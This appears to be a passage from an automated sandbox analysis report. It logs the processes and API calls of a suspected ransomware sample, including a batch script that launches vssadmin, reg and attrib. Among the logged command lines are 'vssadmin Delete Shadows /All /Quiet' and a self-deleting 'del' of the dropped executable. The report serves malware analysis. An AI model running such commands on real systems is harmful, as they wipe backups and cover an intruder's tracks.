Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\CIIHMN~1\AppData\Local\Temp	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x762a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x762bfa80	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x762ba790	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x748035c0	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	-	2	Fn
File	Read	size = 8191, size_out = 445	1	Fn Data
File	Open	-	1	Fn
File	Get Info	type = file_type	1	Fn
File	Open	-	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	-	2	Fn
File	Read	size = 8191, size_out = 434	1	Fn Data
File	Open	-	1	Fn
File	Get Info	type = file_type	1	Fn
File	Open	-	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\vssadmin.exe, os_pid = 0xe74, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000002	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	-	2	Fn
File	Read	size = 8191, size_out = 393	1	Fn Data
File	Open	-	1	Fn
File	Get Info	type = file_type	1	Fn
File	Open	-	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\reg.exe, os_pid = 0xe8c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000001	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	-	2	Fn
File	Read	size = 8191, size_out = 304	1	Fn Data
File	Open	-	1	Fn
File	Get Info	type = file_type	1	Fn
File	Open	-	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\reg.exe, os_pid = 0xe98, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000001	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	-	2	Fn
File	Read	size = 8191, size_out = 219	1	Fn Data
File	Open	-	1	Fn
File	Get Info	type = file_type	1	Fn
File	Open	-	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\reg.exe, os_pid = 0xea4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	-	2	Fn
File	Read	size = 8191, size_out = 140	1	Fn Data
File	Open	-	1	Fn
File	Get Info	type = file_type	1	Fn
File	Open	-	1	Fn
Environment	Get Environment String	name = userprofile, result_out = C:\Users\CIiHmnxMn6Ps	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\documents, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Documents, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\CIiHmnxMn6Ps\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	-	2	Fn
File	Read	size = 8191, size_out = 111	1	Fn Data
File	Open	-	1	Fn
File	Get Info	type = file_type	1	Fn
File	Open	-	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\attrib.exe, os_pid = 0xeb0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	-	2	Fn
File	Read	size = 8191, size_out = 85	1	Fn Data
File	Open	-	1	Fn
File	Get Info	type = file_type	1	Fn
File	Open	-	1	Fn
File	Get Info	filename = Default.rdp, type = file_attributes	2	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 60	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	-	2	Fn
File	Read	size = 8191, size_out = 67	1	Fn Data
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 33	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #15: cmd.exe

(Host: 55, Network: 0)

Information	Value
ID	#15
File Name	c:\windows\syswow64\cmd.exe
Command Line	"C:\Windows\system32\cmd.exe" /c del C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe > nul
Initial Working Directory	C:\Users\CIIHMN~1\AppData\Local\Temp\
Monitor	Start Time: 00:03:04, Reason: Child Process
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:02:19

OS Process Information

Information	Value
PID	0xe68
Parent PID	0xd94 (c:\users\ciihmnxmn6ps\appdata\roaming\vworbzlbc.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (USE_FOR_DENY_ONLY) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000149ea (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x E6C 0x ED4

Region

Name	Start VA	End VA	Type	Permissions	Actions
cmd.exe	0x00ba0000	0x00beffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000d70000	0x00d70000	0x04d6ffff	Pagefile Backed Memory	-	Region Actions
private_0x0000000004d70000	0x04d70000	0x04d8ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000004d70000	0x04d70000	0x04d7ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000004d80000	0x04d80000	0x04d83fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004d90000	0x04d90000	0x04d91fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004d90000	0x04d90000	0x04d93fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000004da0000	0x04da0000	0x04db3fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000004dc0000	0x04dc0000	0x04dfffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004e00000	0x04e00000	0x04efffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000004f00000	0x04f00000	0x04f03fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000004f10000	0x04f10000	0x04f10fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000004f20000	0x04f20000	0x04f21fff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x04f30000	0x04fedfff	Memory Mapped File	Readable	Region Actions
private_0x0000000004ff0000	0x04ff0000	0x04ffffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005020000	0x05020000	0x0511ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005120000	0x05120000	0x0515ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005160000	0x05160000	0x0525ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000052a0000	0x052a0000	0x052affff	Private Memory	Readable, Writable	Region Actions
msvcrt.dll	0x744a0000	0x7455dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x746f0000	0x74865fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x762a0000	0x7638ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x76870000	0x76877fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x76880000	0x768cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x768d0000	0x76942fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77208fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007e740000	0x7e740000	0x7e83ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007e840000	0x7e840000	0x7e862fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007e865000	0x7e865000	0x7e865fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007e867000	0x7e867000	0x7e869fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007e86a000	0x7e86a000	0x7e86afff	Private Memory	Readable, Writable	Region Actions
private_0x000000007e86d000	0x7e86d000	0x7e86ffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7dff470fffff	Private Memory	Readable	Region Actions
pagefile_0x00007dff47100000	0x7dff47100000	0x7fff470fffff	Pagefile Backed Memory	-	Region Actions
ntdll.dll	0x7fff47100000	0x7fff472c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00007fff472c2000	0x7fff472c2000	0x7ffffffeffff	Private Memory	Readable	Region Actions

Threads

Thread 0xe6c

(Host: 47, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\syswow64\cmd.exe, base_address = 0xba0000	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x762a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x762e2780	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 240, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\CIIHMN~1\AppData\Local\Temp	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x762a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x762bfa80	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x762ba790	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x748035c0	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Create	filename = nul, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, type = file_attributes	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #16: vssadmin.exe

Information	Value
ID	#16
File Name	c:\windows\syswow64\vssadmin.exe
Command Line	vssadmin.exe Delete Shadows /All /Quiet
Initial Working Directory	C:\Users\CIIHMN~1\AppData\Local\Temp\
Monitor	Start Time: 00:03:04, Reason: Child Process
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:02:19
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xe74
Parent PID	0xe40 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (USE_FOR_DENY_ONLY) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000149ea (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x E78 0x E7C 0x E80 0x E84 0x E88

Region

Name	Start VA	End VA	Type	Permissions	Actions
vssadmin.exe	0x00c20000	0x00c3dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000f00000	0x00f00000	0x04efffff	Pagefile Backed Memory	-	Region Actions
private_0x0000000004f00000	0x04f00000	0x04f1ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000004f00000	0x04f00000	0x04f0ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000004f10000	0x04f10000	0x04f13fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004f20000	0x04f20000	0x04f21fff	Private Memory	Readable, Writable	Region Actions
vssadmin.exe.mui	0x04f20000	0x04f2cfff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000004f30000	0x04f30000	0x04f43fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000004f50000	0x04f50000	0x04f8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004f90000	0x04f90000	0x04fcffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000004fd0000	0x04fd0000	0x04fd3fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000004fe0000	0x04fe0000	0x04fe0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000004ff0000	0x04ff0000	0x04ff1fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005000000	0x05000000	0x05000fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005010000	0x05010000	0x05010fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005020000	0x05020000	0x0502ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005030000	0x05030000	0x0506ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005070000	0x05070000	0x05073fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000005080000	0x05080000	0x05080fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000005090000	0x05090000	0x05090fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000050a0000	0x050a0000	0x0519ffff	Private Memory	Readable, Writable	Region Actions
